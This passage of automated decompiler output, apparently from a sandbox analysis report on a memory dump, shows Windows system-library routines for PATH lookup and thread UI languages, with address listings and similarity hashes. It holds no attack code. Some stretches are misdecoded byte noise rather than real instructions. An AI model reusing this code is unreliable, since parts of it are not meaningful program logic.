                                                                                          											_t215 = _v72;
                                                                                          											__eflags = _t215;
                                                                                          											if(_t215 != 0) {
                                                                                          												L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
                                                                                          											}
                                                                                          											_t216 = _v52;
                                                                                          											__eflags = _t216;
                                                                                          											if(_t216 != 0) {
                                                                                          												__eflags = _t328;
                                                                                          												if(_t328 < 0) {
                                                                                          													L01B577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
                                                                                          													_t216 = 0;
                                                                                          												}
                                                                                          											}
                                                                                          											goto L36;
                                                                                          										} else {
                                                                                          											__eax = _v44;
                                                                                          											__ebx = __ebx + __eax * 2;
                                                                                          											__ebx = __ebx + 2;
                                                                                          											__eflags = __ebx;
                                                                                          											L13:
                                                                                          											_t283 = _v36;
                                                                                          											goto L14;
                                                                                          										}
                                                                                          									}
                                                                                          								} else {
                                                                                          									__eax = _v44;
                                                                                          									__ecx =  *0x1c27b9c; // 0x0
                                                                                          									_v44 + _v44 =  *[fs:0x30];
                                                                                          									__ecx = __ecx + 0x180000;
                                                                                          									__eax = L01B54620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                                                                          									_v72 = __eax;
                                                                                          									__eflags = __eax;
                                                                                          									if(__eax == 0) {
                                                                                          										__eax = E01B4EB70(__ecx, 0x1c279a0);
                                                                                          										__eax = _v52;
                                                                                          										L36:
                                                                                          										_pop(_t321);
                                                                                          										_pop(_t329);
                                                                                          										__eflags = _v8 ^ _t334;
                                                                                          										_pop(_t276);
                                                                                          										return E01B7B640(_t216, _t276, _v8 ^ _t334, _t303, _t321, _t329);
                                                                                          									} else {
                                                                                          										__ecx =  &_v44;
                                                                                          										_push(__ecx);
                                                                                          										_push(_v44);
                                                                                          										_push(__eax);
                                                                                          										_push(4);
                                                                                          										_push(L"PATH");
                                                                                          										_push(0);
                                                                                          										L57();
                                                                                          										__esi = __eax;
                                                                                          										_v68 = __eax;
                                                                                          										goto L10;
                                                                                          									}
                                                                                          								}
                                                                                          								goto L108;
                                                                                          							case 4:
                                                                                          								__ebx = __ebx + 4;
                                                                                          								goto L14;
                                                                                          							case 5:
                                                                                          								_t271 = _v56;
                                                                                          								if(_v56 != 0) {
                                                                                          									_t303 =  &_v36;
                                                                                          									_t273 = E01B62E3E(_t271,  &_v36);
                                                                                          									_t283 = _v36;
                                                                                          									_v76 = _t273;
                                                                                          								}
                                                                                          								if(_t283 == 0) {
                                                                                          									goto L44;
                                                                                          								} else {
                                                                                          									_t275 = _t275 + 2 + _t283;
                                                                                          								}
                                                                                          								goto L14;
                                                                                          							case 6:
                                                                                          								__eax =  *0x1c25764 & 0x0000ffff;
                                                                                          								goto L53;
                                                                                          							case 7:
                                                                                          								__eax =  *0x1c28478 & 0x0000ffff;
                                                                                          								__ebx = __ebx + __eax;
                                                                                          								__eflags = _a8;
                                                                                          								if(_a8 != 0) {
                                                                                          									__ebx = __ebx + 0x16;
                                                                                          									__ebx = __ebx + __eax;
                                                                                          								}
                                                                                          								__eflags = __dl;
                                                                                          								if(__dl != 0) {
                                                                                          									__eax = 0x1c28478;
                                                                                          									L80:
                                                                                          									_v32 = __eax;
                                                                                          								}
                                                                                          								goto L14;
                                                                                          							case 8:
                                                                                          								__eax =  *0x1c26e58 & 0x0000ffff;
                                                                                          								__eax = ( *0x1c26e58 & 0x0000ffff) + 2;
                                                                                          								L53:
                                                                                          								__ebx = __ebx + __eax;
                                                                                          								L14:
                                                                                          								_t320 = _t320 + 1;
                                                                                          								if(_t320 >= _v48) {
                                                                                          									goto L16;
                                                                                          								} else {
                                                                                          									_t303 = _v37;
                                                                                          									goto L1;
                                                                                          								}
                                                                                          								goto L108;
                                                                                          						}
                                                                                          					}
                                                                                          					L56:
                                                                                          					asm("int 0x29");
                                                                                          					asm("out 0x28, al");
                                                                                          					asm("o16 sub [esi-0x49d81fff], dh");
                                                                                          					 *_t327 =  *_t327 + _t334;
                                                                                          					_t330 = _t327 + 1;
                                                                                          					 *((intOrPtr*)(_t330 - 0x49d9faff)) =  *((intOrPtr*)(_t330 - 0x49d9faff)) - 1;
                                                                                          					 *_t322 =  *_t322 + _t275;
                                                                                          					_t279 = 0x25;
                                                                                          					 *0x201ba5b =  *0x201ba5b + _t330;
                                                                                          					 *((intOrPtr*)(_t330 - 0x49d77fff)) =  *((intOrPtr*)(_t330 - 0x49d77fff)) - _t330;
                                                                                          					_t331 = _t330 + _t330;
                                                                                          					asm("daa");
                                                                                          					_push(ds);
                                                                                          					 *((intOrPtr*)(_t331 - 0x49d7b1ff)) =  *((intOrPtr*)(_t331 - 0x49d7b1ff)) - 1;
                                                                                          					_a35 = _a35 + _t279;
                                                                                          					asm("fcomp dword [ebx-0x46]");
                                                                                          					 *((intOrPtr*)(_t241 +  &_a1546912178)) =  *((intOrPtr*)(_t241 +  &_a1546912178)) + _t331;
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					asm("int3");
                                                                                          					_push(0x20);
                                                                                          					_push(0x1c0ff00);
                                                                                          					E01B8D08C(_t279, _t322, _t331);
                                                                                          					_v44 =  *[fs:0x18];
                                                                                          					_t323 = 0;
                                                                                          					 *_a24 = 0;
                                                                                          					_t280 = _a12;
                                                                                          					__eflags = _t280;
                                                                                          					if(_t280 == 0) {
                                                                                          						_t244 = 0xc0000100;
                                                                                          					} else {
                                                                                          						_v8 = 0;
                                                                                          						_t332 = 0xc0000100;
                                                                                          						_v52 = 0xc0000100;
                                                                                          						_t246 = 4;
                                                                                          						while(1) {
                                                                                          							_v40 = _t246;
                                                                                          							__eflags = _t246;
                                                                                          							if(_t246 == 0) {
                                                                                          								break;
                                                                                          							}
                                                                                          							_t293 = _t246 * 0xc;
                                                                                          							_v48 = _t293;
                                                                                          							__eflags = _t280 -  *((intOrPtr*)(_t293 + 0x1b11664));
                                                                                          							if(__eflags <= 0) {
                                                                                          								if(__eflags == 0) {
                                                                                          									_t261 = E01B7E5C0(_a8,  *((intOrPtr*)(_t293 + 0x1b11668)), _t280);
                                                                                          									_t337 = _t337 + 0xc;
                                                                                          									__eflags = _t261;
                                                                                          									if(__eflags == 0) {
                                                                                          										_t332 = E01BB51BE(_t280,  *((intOrPtr*)(_v48 + 0x1b1166c)), _a16, _t323, _t332, __eflags, _a20, _a24);
                                                                                          										_v52 = _t332;
                                                                                          										break;
                                                                                          									} else {
                                                                                          										_t246 = _v40;
                                                                                          										goto L62;
                                                                                          									}
                                                                                          									goto L70;
                                                                                          								} else {
                                                                                          									L62:
                                                                                          									_t246 = _t246 - 1;
                                                                                          									continue;
                                                                                          								}
                                                                                          							}
                                                                                          							break;
                                                                                          						}
                                                                                          						_v32 = _t332;
                                                                                          						__eflags = _t332;
                                                                                          						if(_t332 < 0) {
                                                                                          							__eflags = _t332 - 0xc0000100;
                                                                                          							if(_t332 == 0xc0000100) {
                                                                                          								_t289 = _a4;
                                                                                          								__eflags = _t289;
                                                                                          								if(_t289 != 0) {
                                                                                          									_v36 = _t289;
                                                                                          									__eflags =  *_t289 - _t323;
                                                                                          									if( *_t289 == _t323) {
                                                                                          										_t332 = 0xc0000100;
                                                                                          										goto L76;
                                                                                          									} else {
                                                                                          										_t311 =  *((intOrPtr*)(_v44 + 0x30));
                                                                                          										_t248 =  *((intOrPtr*)(_t311 + 0x10));
                                                                                          										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t289;
                                                                                          										if( *((intOrPtr*)(_t248 + 0x48)) == _t289) {
                                                                                          											__eflags =  *(_t311 + 0x1c);
                                                                                          											if( *(_t311 + 0x1c) == 0) {
                                                                                          												L106:
                                                                                          												_t332 = E01B62AE4( &_v36, _a8, _t280, _a16, _a20, _a24);
                                                                                          												_v32 = _t332;
                                                                                          												__eflags = _t332 - 0xc0000100;
                                                                                          												if(_t332 != 0xc0000100) {
                                                                                          													goto L69;
                                                                                          												} else {
                                                                                          													_t323 = 1;
                                                                                          													_t289 = _v36;
                                                                                          													goto L75;
                                                                                          												}
                                                                                          											} else {
                                                                                          												_t251 = E01B46600( *(_t311 + 0x1c));
                                                                                          												__eflags = _t251;
                                                                                          												if(_t251 != 0) {
                                                                                          													goto L106;
                                                                                          												} else {
                                                                                          													_t289 = _a4;
                                                                                          													goto L75;
                                                                                          												}
                                                                                          											}
                                                                                          										} else {
                                                                                          											L75:
                                                                                          											_t332 = E01B62C50(_t289, _a8, _t280, _a16, _a20, _a24, _t323);
                                                                                          											L76:
                                                                                          											_v32 = _t332;
                                                                                          											goto L69;
                                                                                          										}
                                                                                          									}
                                                                                          									goto L108;
                                                                                          								} else {
                                                                                          									E01B4EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                                          									_v8 = 1;
                                                                                          									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                                                          									_t332 = _a24;
                                                                                          									_t258 = E01B62AE4( &_v36, _a8, _t280, _a16, _a20, _t332);
                                                                                          									_v32 = _t258;
                                                                                          									__eflags = _t258 - 0xc0000100;
                                                                                          									if(_t258 == 0xc0000100) {
                                                                                          										_v32 = E01B62C50(_v36, _a8, _t280, _a16, _a20, _t332, 1);
                                                                                          									}
                                                                                          									_v8 = _t323;
                                                                                          									E01B62ACB();
                                                                                          								}
                                                                                          							}
                                                                                          						}
                                                                                          						L69:
                                                                                          						_v8 = 0xfffffffe;
                                                                                          						_t244 = _t332;
                                                                                          					}
                                                                                          					L70:
                                                                                          					return E01B8D0D1(_t244);
                                                                                          				}
                                                                                          				L108:
                                                                                          			}



















































                                                                                          0x01ba5b15
                                                                                          0x01ba5b17
                                                                                          0x00000000
                                                                                          0x01b626b8
                                                                                          0x01b626b8
                                                                                          0x01b626ba
                                                                                          0x01b627a6
                                                                                          0x01b627a6
                                                                                          0x01b627a9
                                                                                          0x01b627ab
                                                                                          0x01b627b9
                                                                                          0x01b627b9
                                                                                          0x01b627be
                                                                                          0x01b627c1
                                                                                          0x01b627c3
                                                                                          0x01b627c5
                                                                                          0x01b627c7
                                                                                          0x01ba5c74
                                                                                          0x01ba5c79
                                                                                          0x01ba5c79
                                                                                          0x01b627c7
                                                                                          0x00000000
                                                                                          0x01b626c0
                                                                                          0x01b626c0
                                                                                          0x01b626c3
                                                                                          0x01b626c6
                                                                                          0x01b626c6
                                                                                          0x01b626c9
                                                                                          0x01b626c9
                                                                                          0x00000000
                                                                                          0x01b626c9
                                                                                          0x01b626ba
                                                                                          0x01b6265b
                                                                                          0x01b6265b
                                                                                          0x01b6265e
                                                                                          0x01b62667
                                                                                          0x01b6266d
                                                                                          0x01b62677
                                                                                          0x01b6267c
                                                                                          0x01b6267f
                                                                                          0x01b62681
                                                                                          0x01ba5b49
                                                                                          0x01ba5b4e
                                                                                          0x01b627cd
                                                                                          0x01b627d0
                                                                                          0x01b627d1
                                                                                          0x01b627d2
                                                                                          0x01b627d4
                                                                                          0x01b627dd
                                                                                          0x01b62687
                                                                                          0x01b62687
                                                                                          0x01b6268a
                                                                                          0x01b6268b
                                                                                          0x01b6268e
                                                                                          0x01b6268f
                                                                                          0x01b62691
                                                                                          0x01b62696
                                                                                          0x01b62698
                                                                                          0x01b6269d
                                                                                          0x01b6269f
                                                                                          0x00000000
                                                                                          0x01b6269f
                                                                                          0x01b62681
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b62846
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b62605
                                                                                          0x01b6260a
                                                                                          0x01b6260c
                                                                                          0x01b62611
                                                                                          0x01b62616
                                                                                          0x01b62619
                                                                                          0x01b62619
                                                                                          0x01b6261e
                                                                                          0x00000000
                                                                                          0x01b62624
                                                                                          0x01b62627
                                                                                          0x01b62627
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba5b1f
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b62894
                                                                                          0x01b6289b
                                                                                          0x01b6289d
                                                                                          0x01b628a1
                                                                                          0x01ba5b2b
                                                                                          0x01ba5b2e
                                                                                          0x01ba5b2e
                                                                                          0x01b628a7
                                                                                          0x01b628a9
                                                                                          0x01ba5b04
                                                                                          0x01ba5b09
                                                                                          0x01ba5b09
                                                                                          0x01ba5b09
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01ba5b35
                                                                                          0x01ba5b3c
                                                                                          0x01b628fb
                                                                                          0x01b628fb
                                                                                          0x01b626cc
                                                                                          0x01b626cc
                                                                                          0x01b626d0
                                                                                          0x00000000
                                                                                          0x01b626d2
                                                                                          0x01b626d2
                                                                                          0x00000000
                                                                                          0x01b626d2
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b625fe
                                                                                          0x01b6292d
                                                                                          0x01b62930
                                                                                          0x01b62935
                                                                                          0x01b62939
                                                                                          0x01b62940
                                                                                          0x01b62945
                                                                                          0x01b62946
                                                                                          0x01b6294c
                                                                                          0x01b6294e
                                                                                          0x01b62954
                                                                                          0x01b6295a
                                                                                          0x01b62960
                                                                                          0x01b62962
                                                                                          0x01b62965
                                                                                          0x01b62966
                                                                                          0x01b6296c
                                                                                          0x01b62971
                                                                                          0x01b62974
                                                                                          0x01b62980
                                                                                          0x01b62981
                                                                                          0x01b62982
                                                                                          0x01b62983
                                                                                          0x01b62984
                                                                                          0x01b62985
                                                                                          0x01b62986
                                                                                          0x01b62987
                                                                                          0x01b62988
                                                                                          0x01b62989
                                                                                          0x01b6298a
                                                                                          0x01b6298b
                                                                                          0x01b6298c
                                                                                          0x01b6298d
                                                                                          0x01b6298e
                                                                                          0x01b6298f
                                                                                          0x01b62990
                                                                                          0x01b62992
                                                                                          0x01b62997
                                                                                          0x01b629a3
                                                                                          0x01b629a6
                                                                                          0x01b629ab
                                                                                          0x01b629ad
                                                                                          0x01b629b0
                                                                                          0x01b629b2
                                                                                          0x01ba5c80
                                                                                          0x01b629b8
                                                                                          0x01b629b8
                                                                                          0x01b629bb
                                                                                          0x01b629c0
                                                                                          0x01b629c5
                                                                                          0x01b629c6
                                                                                          0x01b629c6
                                                                                          0x01b629c9
                                                                                          0x01b629cb
                                                                                          0x00000000
                                                                                          0x00000000
                                                                                          0x01b629cd
                                                                                          0x01b629d0
                                                                                          0x01b629d9
                                                                                          0x01b629db
                                                                                          0x01b629dd
                                                                                          0x01b62a7f
                                                                                          0x01b62a84
                                                                                          0x01b62a87
                                                                                          0x01b62a89
                                                                                          0x01ba5ca1
                                                                                          0x01ba5ca3
                                                                                          0x00000000
                                                                                          0x01b62a8f
                                                                                          0x01b62a8f
                                                                                          0x00000000
                                                                                          0x01b62a8f
                                                                                          0x00000000
                                                                                          0x01b629e3
                                                                                          0x01b629e3
                                                                                          0x01b629e3
                                                                                          0x00000000
                                                                                          0x01b629e3
                                                                                          0x01b629dd
                                                                                          0x00000000
                                                                                          0x01b629db
                                                                                          0x01b629e6
                                                                                          0x01b629e9
                                                                                          0x01b629eb
                                                                                          0x01b629ed
                                                                                          0x01b629f3
                                                                                          0x01b629f5
                                                                                          0x01b629f8
                                                                                          0x01b629fa
                                                                                          0x01b62a97
                                                                                          0x01b62a9a
                                                                                          0x01b62a9d
                                                                                          0x01b62add
                                                                                          0x00000000
                                                                                          0x01b62a9f
                                                                                          0x01b62aa2
                                                                                          0x01b62aa5
                                                                                          0x01b62aa8
                                                                                          0x01b62aab
                                                                                          0x01ba5cab
                                                                                          0x01ba5caf
                                                                                          0x01ba5cc5
                                                                                          0x01ba5cda
                                                                                          0x01ba5cdc
                                                                                          0x01ba5cdf
                                                                                          0x01ba5ce5
                                                                                          0x00000000
                                                                                          0x01ba5ceb
                                                                                          0x01ba5ced
                                                                                          0x01ba5cee
                                                                                          0x00000000
                                                                                          0x01ba5cee
                                                                                          0x01ba5cb1
                                                                                          0x01ba5cb4
                                                                                          0x01ba5cb9
                                                                                          0x01ba5cbb
                                                                                          0x00000000
                                                                                          0x01ba5cbd
                                                                                          0x01ba5cbd
                                                                                          0x00000000
                                                                                          0x01ba5cbd
                                                                                          0x01ba5cbb
                                                                                          0x01b62ab1
                                                                                          0x01b62ab1
                                                                                          0x01b62ac4
                                                                                          0x01b62ac6
                                                                                          0x01b62ac6
                                                                                          0x00000000
                                                                                          0x01b62ac6
                                                                                          0x01b62aab
                                                                                          0x00000000
                                                                                          0x01b62a00
                                                                                          0x01b62a09
                                                                                          0x01b62a0e
                                                                                          0x01b62a21
                                                                                          0x01b62a24
                                                                                          0x01b62a35
                                                                                          0x01b62a3a
                                                                                          0x01b62a3d
                                                                                          0x01b62a42
                                                                                          0x01b62a59
                                                                                          0x01b62a59
                                                                                          0x01b62a5c
                                                                                          0x01b62a5f
                                                                                          0x01b62a5f
                                                                                          0x01b629fa
                                                                                          0x01b629f3
                                                                                          0x01b62a64
                                                                                          0x01b62a64
                                                                                          0x01b62a6b
                                                                                          0x01b62a6b
                                                                                          0x01b62a6d
                                                                                          0x01b62a72
                                                                                          0x01b62a72
                                                                                          0x00000000

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000B.00000002.793570787.0000000001B10000.00000040.00000001.sdmp, Offset: 01B10000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: PATH
                                                                                          • API String ID: 0-1036084923
                                                                                          • Opcode ID: 65530bd3841cb441576aa4c291239b767fcc25beb1ae5adcf8acb75bbd6b3cfd
                                                                                          • Instruction ID: c96c04e6d75eedbd69c6c50d77fe678bdb4fdef14d9fa7d7c1fe9c0ee4edbf26
                                                                                          • Opcode Fuzzy Hash: 65530bd3841cb441576aa4c291239b767fcc25beb1ae5adcf8acb75bbd6b3cfd
                                                                                          • Instruction Fuzzy Hash: 1AC18F71E10219DFEB29DF99D881BBDBBB5FF68700F4441A9E901AB250D738AD41CB60
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          C-Code - Quality: 80%
                                                                                          			E01B6FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                                                          				char _v5;
                                                                                          				signed int _v8;
                                                                                          				signed int _v12;
                                                                                          				char _v16;
                                                                                          				char _v17;
                                                                                          				char _v20;
                                                                                          				signed int _v24;
                                                                                          				char _v28;
                                                                                          				char _v32;
                                                                                          				signed int _v40;
                                                                                          				void* __ecx;
                                                                                          				void* __edi;
                                                                                          				void* __ebp;
                                                                                          				signed int _t73;
                                                                                          				intOrPtr* _t75;
                                                                                          				signed int _t77;
                                                                                          				signed int _t79;
                                                                                          				signed int _t81;
                                                                                          				intOrPtr _t83;
                                                                                          				intOrPtr _t85;
                                                                                          				intOrPtr _t86;
                                                                                          				signed int _t91;
                                                                                          				signed int _t94;
                                                                                          				signed int _t95;
                                                                                          				signed int _t96;
                                                                                          				signed int _t106;
                                                                                          				signed int _t108;
                                                                                          				signed int _t114;
                                                                                          				signed int _t116;
                                                                                          				signed int _t118;
                                                                                          				signed int _t122;
                                                                                          				signed int _t123;
                                                                                          				void* _t129;
                                                                                          				signed int _t130;
                                                                                          				void* _t132;
                                                                                          				intOrPtr* _t134;
                                                                                          				signed int _t138;
                                                                                          				signed int _t141;
                                                                                          				signed int _t147;
                                                                                          				intOrPtr _t153;
                                                                                          				signed int _t154;
                                                                                          				signed int _t155;
                                                                                          				signed int _t170;
                                                                                          				void* _t174;
                                                                                          				signed int _t176;
                                                                                          				signed int _t177;
                                                                                          
                                                                                          				_t129 = __ebx;
                                                                                          				_push(_t132);
                                                                                          				_push(__esi);
                                                                                          				_t174 = _t132;
                                                                                          				_t73 =  !( *( *(_t174 + 0x18)));
                                                                                          				if(_t73 >= 0) {
                                                                                          					L5:
                                                                                          					return _t73;
                                                                                          				} else {
                                                                                          					E01B4EEF0(0x1c27b60);
                                                                                          					_t134 =  *0x1c27b84; // 0x771c7b80
                                                                                          					_t2 = _t174 + 0x24; // 0x24
                                                                                          					_t75 = _t2;
                                                                                          					if( *_t134 != 0x1c27b80) {
                                                                                          						_push(3);
                                                                                          						asm("int 0x29");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						asm("int3");
                                                                                          						_push(0x1c27b60);
                                                                                          						_t170 = _v8;
                                                                                          						_v28 = 0;
                                                                                          						_v40 = 0;
                                                                                          						_v24 = 0;
                                                                                          						_v17 = 0;
                                                                                          						_v32 = 0;
                                                                                          						__eflags = _t170 & 0xffff7cf2;
                                                                                          						if((_t170 & 0xffff7cf2) != 0) {
                                                                                          							L43:
                                                                                          							_t77 = 0xc000000d;
                                                                                          						} else {
                                                                                          							_t79 = _t170 & 0x0000000c;
                                                                                          							__eflags = _t79;
                                                                                          							if(_t79 != 0) {
                                                                                          								__eflags = _t79 - 0xc;
                                                                                          								if(_t79 == 0xc) {
                                                                                          									goto L43;
                                                                                          								} else {
                                                                                          									goto L9;
                                                                                          								}
                                                                                          							} else {
                                                                                          								_t170 = _t170 | 0x00000008;
                                                                                          								__eflags = _t170;
                                                                                          								L9:
                                                                                          								_t81 = _t170 & 0x00000300;
                                                                                          								__eflags = _t81 - 0x300;
                                                                                          								if(_t81 == 0x300) {
                                                                                          									goto L43;
                                                                                          								} else {
                                                                                          									_t138 = _t170 & 0x00000001;
                                                                                          									__eflags = _t138;
                                                                                          									_v24 = _t138;
                                                                                          									if(_t138 != 0) {
                                                                                          										__eflags = _t81;
                                                                                          										if(_t81 != 0) {
                                                                                          											goto L43;
                                                                                          										} else {
                                                                                          											goto L11;
                                                                                          										}
                                                                                          									} else {
                                                                                          										L11:
                                                                                          										_push(_t129);
                                                                                          										_t77 = E01B46D90( &_v20);
                                                                                          										_t130 = _t77;
                                                                                          										__eflags = _t130;
                                                                                          										if(_t130 >= 0) {
                                                                                          											_push(_t174);
                                                                                          											__eflags = _t170 & 0x00000301;
                                                                                          											if((_t170 & 0x00000301) == 0) {
                                                                                          												_t176 = _a8;
                                                                                          												__eflags = _t176;
                                                                                          												if(__eflags == 0) {
                                                                                          													L64:
                                                                                          													_t83 =  *[fs:0x18];
                                                                                          													_t177 = 0;
                                                                                          													__eflags =  *(_t83 + 0xfb8);
                                                                                          													if( *(_t83 + 0xfb8) != 0) {
                                                                                          														E01B476E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                                                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                                                          													}
                                                                                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                                                          													goto L15;
                                                                                          												} else {
                                                                                          													asm("sbb edx, edx");
                                                                                          													_t114 = E01BD8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                                                          													__eflags = _t114;
                                                                                          													if(_t114 < 0) {
                                                                                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                                                          														E01B3B150();
                                                                                          													}
                                                                                          													_t116 = E01BD6D81(_t176,  &_v16);
                                                                                          													__eflags = _t116;
                                                                                          													if(_t116 >= 0) {
                                                                                          														__eflags = _v16 - 2;
                                                                                          														if(_v16 < 2) {
                                                                                          															L56:
                                                                                          															_t118 = E01B475CE(_v20, 5, 0);
                                                                                          															__eflags = _t118;
                                                                                          															if(_t118 < 0) {
                                                                                          																L67:
                                                                                          																_t130 = 0xc0000017;
                                                                                          																goto L32;
                                                                                          															} else {
                                                                                          																__eflags = _v12;
                                                                                          																if(_v12 == 0) {
                                                                                          																	goto L67;
                                                                                          																} else {
                                                                                          																	_t153 =  *0x1c28638; // 0x0
                                                                                          																	_t122 = L01B438A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                                                          																	_t154 = _v12;
                                                                                          																	_t130 = _t122;
                                                                                          																	__eflags = _t130;
                                                                                          																	if(_t130 >= 0) {
                                                                                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                                                          																		__eflags = _t123;
                                                                                          																		if(_t123 != 0) {
                                                                                          																			_t155 = _a12;
                                                                                          																			__eflags = _t155;
                                                                                          																			if(_t155 != 0) {
                                                                                          																				 *_t155 = _t123;
                                                                                          																			}
                                                                                          																			goto L64;
                                                                                          																		} else {
                                                                                          																			E01B476E2(_t154);
                                                                                          																			goto L41;
                                                                                          																		}
                                                                                          																	} else {
                                                                                          																		E01B476E2(_t154);
                                                                                          																		_t177 = 0;
                                                                                          																		goto L18;
                                                                                          																	}
                                                                                          																}
                                                                                          															}
                                                                                          														} else {
                                                                                          															__eflags =  *_t176;
                                                                                          															if( *_t176 != 0) {
                                                                                          																goto L56;
                                                                                          															} else {
                                                                                          																__eflags =  *(_t176 + 2);
                                                                                          																if( *(_t176 + 2) == 0) {
                                                                                          																	goto L64;
                                                                                          																} else {
                                                                                          																	goto L56;
                                                                                          																}
                                                                                          															}
                                                                                          														}
                                                                                          													} else {
                                                                                          														_t130 = 0xc000000d;
                                                                                          														goto L32;
                                                                                          													}
                                                                                          												}
                                                                                          												goto L35;
                                                                                          											} else {
                                                                                          												__eflags = _a8;
                                                                                          												if(_a8 != 0) {
                                                                                          													_t77 = 0xc000000d;
                                                                                          												} else {
                                                                                          													_v5 = 1;
                                                                                          													L01B6FCE3(_v20, _t170);
                                                                                          													_t177 = 0;
                                                                                          													__eflags = 0;
                                                                                          													L15:
                                                                                          													_t85 =  *[fs:0x18];
                                                                                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                                                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                                                          														L18:
                                                                                          														__eflags = _t130;
                                                                                          														if(_t130 != 0) {
                                                                                          															goto L32;
                                                                                          														} else {
                                                                                          															__eflags = _v5 - _t130;
                                                                                          															if(_v5 == _t130) {
                                                                                          																goto L32;
                                                                                          															} else {
                                                                                          																_t86 =  *[fs:0x18];
                                                                                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                                                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                                                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                                                          																}
                                                                                          																__eflags = _t177;
                                                                                          																if(_t177 == 0) {
                                                                                          																	L31:
                                                                                          																	__eflags = 0;
                                                                                          																	L01B470F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                                                          																	goto L32;
                                                                                          																} else {
                                                                                          																	__eflags = _v24;
                                                                                          																	_t91 =  *(_t177 + 0x20);
                                                                                          																	if(_v24 != 0) {
                                                                                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                                                          																		goto L31;
                                                                                          																	} else {
                                                                                          																		_t141 = _t91 & 0x00000040;
                                                                                          																		__eflags = _t170 & 0x00000100;
                                                                                          																		if((_t170 & 0x00000100) == 0) {
                                                                                          																			__eflags = _t141;
                                                                                          																			if(_t141 == 0) {
                                                                                          																				L74:
                                                                                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                                                          																				goto L27;
                                                                                          																			} else {
                                                                                          																				_t177 = E01B6FD22(_t177);
                                                                                          																				__eflags = _t177;
                                                                                          																				if(_t177 == 0) {
                                                                                          																					goto L42;
                                                                                          																				} else {
                                                                                          																					_t130 = E01B6FD9B(_t177, 0, 4);
                                                                                          																					__eflags = _t130;
                                                                                          																					if(_t130 != 0) {
                                                                                          																						goto L42;
                                                                                          																					} else {
                                                                                          																						_t68 = _t177 + 0x20;
                                                                                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                          																						__eflags =  *_t68;
                                                                                          																						_t91 =  *(_t177 + 0x20);
                                                                                          																						goto L74;
                                                                                          																					}
                                                                                          																				}
                                                                                          																			}
                                                                                          																			goto L35;
                                                                                          																		} else {
                                                                                          																			__eflags = _t141;
                                                                                          																			if(_t141 != 0) {
                                                                                          																				_t177 = E01B6FD22(_t177);
                                                                                          																				__eflags = _t177;
                                                                                          																				if(_t177 == 0) {
                                                                                          																					L42:
                                                                                          																					_t77 = 0xc0000001;
                                                                                          																					goto L33;
                                                                                          																				} else {
                                                                                          																					_t130 = E01B6FD9B(_t177, 0, 4);
                                                                                          																					__eflags = _t130;
                                                                                          																					if(_t130 != 0) {
                                                                                          																						goto L42;
                                                                                          																					} else {
                                                                                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                                                          																						_t91 =  *(_t177 + 0x20);
                                                                                          																						goto L26;
                                                                                          																					}
                                                                                          																				}
                                                                                          																				goto L35;
                                                                                          																			} else {
                                                                                          																				L26:
                                                                                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                                                          																				__eflags = _t94;
                                                                                          																				L27:
                                                                                          																				 *(_t177 + 0x20) = _t94;
                                                                                          																				__eflags = _t170 & 0x00008000;
                                                                                          																				if((_t170 & 0x00008000) != 0) {
                                                                                          																					_t95 = _a12;
                                                                                          																					__eflags = _t95;
